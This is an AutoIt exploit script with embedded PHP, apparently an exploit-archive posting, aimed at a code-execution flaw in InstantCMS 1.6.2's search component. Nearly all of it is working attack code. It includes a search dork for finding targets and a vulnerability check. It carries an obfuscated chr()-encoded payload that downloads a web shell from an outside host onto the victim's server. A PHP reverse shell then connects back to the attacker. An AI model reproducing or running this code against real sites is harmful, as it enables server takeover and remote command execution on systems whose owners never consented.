#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=exploit.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Inet.au3>
#include <String.au3>
#cs
Demo vid: http://youtu.be/j_RIPh-nYpY
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip
Or:
http://www.instantcms.ru/download.html
Dork: InstantCMS © 2007-2010
In Wild i found 1.7 versions too which is vulnerable too.
<?php
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php
/*********************************************************************************************/
// //
// InstantCMS v1.6 (c) 2010 FREEWARE //
// http://www.instantcms.ru/, info@instantcms.ru //
// //
// written by Vladimir E. Obukhov, 2007-2010 //
// //
/*********************************************************************************************/
// SNIP//
if ($look == 'phrase'){
$against .= '\"'.$query.'\"';
}
//RUN SEARCH PROCESSORS
//get list of components and look for search processor in component folder
$sql = "SELECT link FROM cms_components";
$rs = $inDB->query($sql) ;
if ($inDB->num_rows($rs)){
while ($component = $inDB->fetch_assoc($rs)){
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';
if (file_exists($spfile)){
if (in_array($component['link'], $cfg['comp'])){
include $spfile;
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
}
}
}
}
// EOF SNIP //
Notice: eval() cunstruction.
Exploitation:
Payload: ${echo phpinfo()}
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords
Drop shell?NP.
=======================================================================================
<?php
/*
Simple Payload generator
*/
$str='http://search.tld/andfind.txt';//shell url. you'll drop it from server which is in under your control.//
echo '<pre>' . PHP_EOL;
for($z=0;$z<=strlen($str)-1;$z++)
{
$z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg;
}?>
=======================================================================================
Then drop it using the following way:
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}
As reverse shell uses:
<?php
error_reporting(0);
set_time_limit(0);
$ip=trim((string)$_SERVER['REMOTE_ADDR']);
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);
if (empty($port)){ die('<!-- Welcome BH -->');}
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));
while($alive=@socket_read($socket, 31337))
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);
#ce
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';
$pissagainst_wind='<!-- Welcome BH -->';
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
#cs
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));
exit;
#ce
ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _
'# *Via Reverse Shell* #' & @CRLF & _
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _
'# /AkaStep #' & $triptrop)
if $CmdLine[0] <> 2 Then
;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf
$rsite=$CmdLine[1];
$PayloadUA=$CmdLine[2];
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop);
HttpSetUserAgent($fakeua);
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);
if StringInStr($isvulnerable,'allow_url_fopen') Then
ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop);
Else
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop);
exit;
EndIf
#cs
Time To get reversel shell!
First we'll drop our shell as includes/a.php
Then we'll check for shell existense.
If exists then we'll try bc to us.
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords
#ce
#cs
EXPLOITING!
#ce
HttpSetUserAgent($fakeua)
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)
sleep(Random(1500,3000,1));//random sleep for few seconds
#cs
Now checking for existence of our dropped shell.
#ce
HttpSetUserAgent($fakeua)
$dont=_INetGetSource($rsite & '/includes/a.php',True)
if StringInStr($dont,$pissagainst_wind) Then
ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)
Else
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop);
exit;
EndIf
#cs
And Finally Getting Reverse Shell
#ce
HttpSetUserAgent($PayloadUA)
InetGet($rsite & '/includes/a.php','',1,1)
ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop);
exit;
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
================================================
/AkaStep
#ce